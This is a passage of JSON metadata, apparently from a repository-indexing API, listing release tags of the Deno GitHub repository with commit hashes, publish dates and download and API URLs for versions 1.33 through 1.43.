1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms